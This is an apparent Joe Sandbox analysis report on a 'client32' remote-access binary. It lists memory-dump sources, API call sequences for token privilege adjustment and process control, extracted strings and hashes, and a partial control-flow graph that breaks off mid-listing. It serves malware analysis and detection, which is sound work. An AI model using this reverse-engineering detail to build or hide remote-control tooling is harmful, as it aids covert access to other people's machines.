• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID: Client32$NSMWClass$NSMWClass
• API String ID: 3192549508-611217420
• Opcode ID: 0b0c06552eb5d8578d5f8a1ba1b3e93930f4d748b8e68e94dbd9e084aab78c4a
• Instruction ID: 804cb5d527221f69a992b866d17bc63a828f9d1c02720c4f1a032ef46c9a5584
• Opcode Fuzzy Hash: 0b0c06552eb5d8578d5f8a1ba1b3e93930f4d748b8e68e94dbd9e084aab78c4a
• Instruction Fuzzy Hash: C1F04F7890222ADFC30ADF95C995A59B7F4BB8870CB108574D43547208EB3179048B99
APIs
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,?,11030346,?,00000000), ref: 1109ED68
• GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000001,00000001), ref: 1109ED84
• AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00F9F4D8,00F9F4D8,00F9F4D8,00F9F4D8,00F9F4D8,00F9F4D8,00F9F4D8,111EFB64,?,00000001,00000001), ref: 1109EDB0
• EqualSid.ADVAPI32(?,00F9F4D8,?,00000001,00000001), ref: 1109EDC3
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: InformationToken$AllocateEqualInitialize
• String ID:
• API String ID: 1878589025-0
• Opcode ID: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
• Instruction ID: f2a8bc8f74b1de347afb3cb87d534257ea472b44b3b43d4353705adbfce15ac3
• Opcode Fuzzy Hash: 4b61cf4af713a4b82f6fb566942020194785977790fe51c73b26fe6fb189ff5a
• Instruction Fuzzy Hash: DF213031B0122EABEB10DA98DD95BFEB7B8EB44704F014169E929DB180E671AD10D791
APIs
• GetCurrentProcess.KERNEL32(000F01FF,?,11030703,00000000,00000000,00080000,1B702977,00080000,00000000,?), ref: 1109D88D
• OpenProcessToken.ADVAPI32(00000000), ref: 1109D894
• LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D8A5
• AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D8C9
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
• String ID:
• API String ID: 2349140579-0
• Opcode ID: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
• Instruction ID: 81f12928af7d2c66371a758247fa27ee71cd04b85772abc6619dfc746b0a2552
• Opcode Fuzzy Hash: b1ebb33d0097c2b27741ff61215e6ff8e180ff04b55af2e4c570c349c4c69e7c
• Instruction Fuzzy Hash: 4F018CB2640218ABE710DFA4CD89BABF7BCEB04705F004429E91597280D7B06904CBB0
APIs
• AdjustTokenPrivileges.KERNELBASE(?,00000000,?,?,00000000,00000000,00000000,1109EC30,00000244,cant create events), ref: 1109D90C
• CloseHandle.KERNEL32(?,00000000,1109EC30,00000244,cant create events), ref: 1109D915
Memory Dump Source
• Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
• Opcode ID: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
• Instruction ID: 1087c1a68057020919897756081cb42e4a012b8ce4d03b8cf520615490e2fd10
• Opcode Fuzzy Hash: 7d88282d2466d0bea445bfa4253874e9d1aaaebadf3be96b3f697e0eef8d2738
• Instruction Fuzzy Hash: 3CE08C30280214ABE338DE24AD90FA673EDAF05B04F11092DF8A6D2580CA60E8008B60
                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • GetSystemMetrics.USER32(00002000), ref: 1102ED54
                                                                                • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EF15
                                                                                  • Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
                                                                                  • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                  • Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
                                                                                  • Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
                                                                                  • Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102EF4B
                                                                                • OpenProcess.KERNEL32(00100400,00000000,?), ref: 1102EF6D
                                                                                • IsILS.PCICHEK(?,?,View,Client,Bridge), ref: 1102F22F
                                                                                  • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000018,00000000,00000000,00000000,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F1C
                                                                                  • Part of subcall function 11094F00: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,?,1102EF9C,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F29
                                                                                  • Part of subcall function 11094F00: CloseHandle.KERNEL32(00000000,00000000,?,00000100,00000000,00000000,00000000), ref: 11094F59
                                                                                • SendMessageA.USER32(00000000,00000010,00000000,00000000), ref: 1102EFCC
                                                                                • WaitForSingleObject.KERNEL32(00000000,00007530), ref: 1102EFD8
                                                                                • CloseHandle.KERNEL32(00000000), ref: 1102EFF0
                                                                                • FindWindowA.USER32(NSMWClass,00000000), ref: 1102EFFD
                                                                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 1102F019
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 1102ED86
                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                • IsJPIK.PCICHEK(?,?,?,View,Client,Bridge), ref: 1102F3ED
                                                                                • LoadIconA.USER32(11000000,000004C1), ref: 1102F521
                                                                                • LoadIconA.USER32(11000000,000004C2), ref: 1102F531
                                                                                • DestroyCursor.USER32(00000000), ref: 1102F557
                                                                                • DestroyCursor.USER32(00000000), ref: 1102F568
                                                                                  • Part of subcall function 11028360: ImpersonateLoggedOnUser.ADVAPI32(00000000), ref: 110283A3
                                                                                  • Part of subcall function 11028360: GetUserNameA.ADVAPI32(?,?), ref: 110283BC
                                                                                  • Part of subcall function 11028360: RevertToSelf.ADVAPI32 ref: 110283DC
                                                                                  • Part of subcall function 11028360: CloseHandle.KERNEL32(00000000), ref: 110283E3
                                                                                • GetVersion.KERNEL32(?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client,Bridge), ref: 1102FB05
                                                                                • GetVersionExA.KERNEL32(?,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000,?,?,?,View,Client), ref: 1102FB58
                                                                                • Sleep.KERNEL32(00000064,Client,*StartupDelay,00000000,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000,00000000), ref: 110300F2
                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 1103012C
                                                                                • DispatchMessageA.USER32(?), ref: 11030136
                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000009,00000001), ref: 11030148
                                                                                • CloseHandle.KERNEL32(00000000,Function_000278D0,00000001,00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 110303D4
                                                                                • GetCurrentProcess.KERNEL32(00000000,Client,*PriorityClass,00000080,00000000,Client,*ScreenScrape,00000000,00000000,?,?,?,?,?,00000000), ref: 1103040C
                                                                                • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,00000000,MiniDumpType,000000FF,00000000), ref: 11030413
                                                                                • SetWindowPos.USER32(00040310,000000FF,00000000,00000000,00000000,00000000,00000013,Client,AlwaysOnTop,00000000,00000000), ref: 11030449
                                                                                • CloseHandle.KERNEL32(00000000,1105A720,00000001,00000000,?,?,?,?,?,?,?,?,00000000), ref: 110304CA
                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                • wsprintfA.USER32 ref: 11030645
                                                                                  • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,1B702977,?,?,00000000), ref: 1112909A
                                                                                  • Part of subcall function 11129040: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 111290A7
                                                                                  • Part of subcall function 11129040: WaitForSingleObject.KERNEL32(00000006,000000FF,00000000,00000000), ref: 111290EE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$CloseHandleMessageWindow$CreateEvent$CriticalOpenSectionThreadwsprintf$CurrentCursorDestroyFindIconInitializeLoadObjectPeekSingleTokenUserVersionWait$ClassDispatchEnterErrorExitImpersonateLastLoggedMetricsNamePriorityRevertSelfSendSleepSystem__wcstoi64_malloc_memset
                                                                                • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$878411$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$IKS.LIC$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$Unsupported Platform$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                • API String ID: 372548862-2697319139
                                                                                • Opcode ID: f030ead741776a7803f21ff1f7e048a7965167955552501523b662331764eb58
                                                                                • Instruction ID: 381c96219eccee67eae21d9e39560490d5bedbb063d23e5a2fc42920cd5923e4
                                                                                • Opcode Fuzzy Hash: f030ead741776a7803f21ff1f7e048a7965167955552501523b662331764eb58
                                                                                • Instruction Fuzzy Hash: 39F2F978E0226A9FE715CBA0CC94FADF7A5BB4870CF504468F925B72C8DB706940CB56

                                                                                Control-flow Graph

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _malloc_memsetwsprintf
                                                                                • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$18/11/16 11:28:14 V12.10F20$878411$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                • API String ID: 3802068140-2860531889
                                                                                • Opcode ID: 5b056e33e84810f5b47047bfdd2e7b6d2b60f2191365f8a3aba671e699e49f35
                                                                                • Instruction ID: ec88a390f79512b50aba7168cc31da78705c53b3cca2911266f0d70c00f4e6f9
                                                                                • Opcode Fuzzy Hash: 5b056e33e84810f5b47047bfdd2e7b6d2b60f2191365f8a3aba671e699e49f35
                                                                                • Instruction Fuzzy Hash: 8232B175D4127A9FDB22CF90CC84BEDB7B8BB44308F8445E9E559A7280EB706E84CB51

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,757323A0), ref: 11144173
                                                                                • LoadLibraryA.KERNEL32(?), ref: 111441BC
                                                                                • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
                                                                                • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
                                                                                • GetModuleHandleA.KERNEL32(?), ref: 111441EA
                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
                                                                                • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
                                                                                • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
                                                                                • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
                                                                                • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
                                                                                • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
                                                                                • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
                                                                                • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
                                                                                • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
                                                                                • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
                                                                                • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
                                                                                • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC
                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                • API String ID: 3874234733-2061581830
                                                                                • Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                • Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
                                                                                • Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                • Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(setupapi.dll,1B702977,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000,111856D8), ref: 110AA1A3
                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110AA1C7
                                                                                • SetupDiGetClassDevsA.SETUPAPI(111A7EDC,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF), ref: 110AA1E1
                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110AA20C
                                                                                • _free.LIBCMT ref: 110AA240
                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA252
                                                                                • GetLastError.KERNEL32 ref: 110AA27D
                                                                                • _malloc.LIBCMT ref: 110AA293
                                                                                • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110AA2B5
                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA2E7
                                                                                • SetLastError.KERNEL32(00000078), ref: 110AA2FB
                                                                                • GetLastError.KERNEL32 ref: 110AA301
                                                                                • _free.LIBCMT ref: 110AA313
                                                                                • SetLastError.KERNEL32(00000078), ref: 110AA324
                                                                                • SetLastError.KERNEL32(00000078), ref: 110AA331
                                                                                • _free.LIBCMT ref: 110AA344
                                                                                • FreeLibrary.KERNEL32(?,?), ref: 110AA354
                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,111856D8,000000FF,?,1102F855,Client), ref: 110AA3F8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                • API String ID: 3464732724-3340099623
                                                                                • Opcode ID: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
                                                                                • Instruction ID: 5c4fa76f58df98f84a8804f3b2f927c1121c913996f050c4ed1f836ab53a5840
                                                                                • Opcode Fuzzy Hash: dbc8acc033e5e24f37873c07638d6d638064cee8c874e7b38a73b383613d7029
                                                                                • Instruction Fuzzy Hash: CE818472D40219EBEB04DFE4ED88F9EBBB8AF44704F104528F922A76C4DB759945CB50

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2049 1102e199 2050 1102e1a0-1102e1b1 2049->2050 2050->2050 2051 1102e1b3 2050->2051 2052 1102e2f4-1102e30d call 11143690 2051->2052 2055 1102e313-1102e315 2052->2055 2056 1102e190-1102e193 2052->2056 2057 1102e413-1102e42d call 11146fe0 2055->2057 2058 1102e31b-1102e321 2055->2058 2059 1102e195-1102e197 2056->2059 2060 1102e1b8-1102e1c1 2056->2060 2081 1102e483-1102e48f call 1102bc40 2057->2081 2082 1102e42f-1102e448 call 1105e820 2057->2082 2062 1102e323-1102e332 call 11145990 2058->2062 2063 1102e338-1102e348 2058->2063 2059->2050 2060->2052 2064 1102e1c7-1102e1ce 2060->2064 2062->2063 2067 1102e34a 2063->2067 2068 1102e34f-1102e36d call 1102d360 2063->2068 2064->2052 2069 1102e2c3-1102e2d8 call 11163ca7 2064->2069 2070 1102e1d5-1102e1d7 2064->2070 2071 1102e2da-1102e2ef call 11163ca7 2064->2071 2072 1102e26a-1102e29d call 11162777 call 11142e60 2064->2072 2073 1102e2ab-1102e2c1 _strncpy 2064->2073 2074 1102e25b-1102e265 2064->2074 2075 1102e29f-1102e2a9 2064->2075 2076 1102e21c-1102e222 2064->2076 2077 1102e24c-1102e256 2064->2077 2067->2068 2068->2057 2097 1102e373-1102e398 call 110b7df0 call 11147060 2068->2097 2069->2052 2070->2052 2083 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 2070->2083 2071->2052 2072->2052 2073->2052 2074->2052 2075->2052 2084 1102e224-1102e238 call 11163ca7 2076->2084 2085 1102e23d-1102e247 2076->2085 2077->2052 2105 1102e491-1102e498 2081->2105 2106 1102e468-1102e46f 2081->2106 2082->2081 2107 1102e44a-1102e45c 2082->2107 2083->2052 2084->2052 2085->2052 2130 1102e3a3-1102e3a9 2097->2130 2131 1102e39a-1102e3a1 2097->2131 2110 1102e475-1102e478 2105->2110 2112 1102e49a-1102e4a4 2105->2112 2106->2110 2111 1102e67a-1102e69b GetComputerNameA 2106->2111 2107->2081 2122 1102e45e 2107->2122 2116 1102e47a-1102e481 call 110b7df0 2110->2116 2117 1102e4a9 2110->2117 2119 1102e6d3-1102e6d9 2111->2119 2120 1102e69d-1102e6d1 call 11028230 2111->2120 2112->2111 2125 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 2116->2125 2117->2125 2126 1102e6db-1102e6e0 2119->2126 2127 1102e70f-1102e722 _strncpy 2119->2127 2120->2119 2149 1102e727-1102e733 2120->2149 2122->2106 2182 1102e64a-1102e652 SetLastError 2125->2182 2183 1102e58c-1102e5a3 2125->2183 2134 1102e6e6-1102e6ea 2126->2134 2129 1102e917-1102e93a 2127->2129 2150 1102e962-1102e96a 2129->2150 2151 1102e93c-1102e942 2129->2151 2139 1102e3ab-1102e3b2 call 11028360 2130->2139 2140 1102e409 2130->2140 2131->2057 2135 1102e706-1102e708 2134->2135 2136 1102e6ec-1102e6ee 2134->2136 2144 1102e70b-1102e70d 2135->2144 2141 1102e702-1102e704 2136->2141 2142 1102e6f0-1102e6f6 2136->2142 2139->2140 2154 1102e3b4-1102e3e6 2139->2154 2140->2057 2141->2144 2142->2135 2148 1102e6f8-1102e700 2142->2148 2144->2127 2144->2149 2148->2134 2148->2141 2157 1102e735-1102e74a call 110b7df0 call 1102a1f0 2149->2157 2158 1102e74c-1102e75f call 11081d30 2149->2158 2159 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 2150->2159 2160 1102e96c-1102e979 call 11036710 call 11162777 2150->2160 2151->2150 2155 1102e944-1102e95d call 1102d900 2151->2155 2173 1102e3f0-1102e3ff call 110f64d0 2154->2173 2174 1102e3e8-1102e3ee 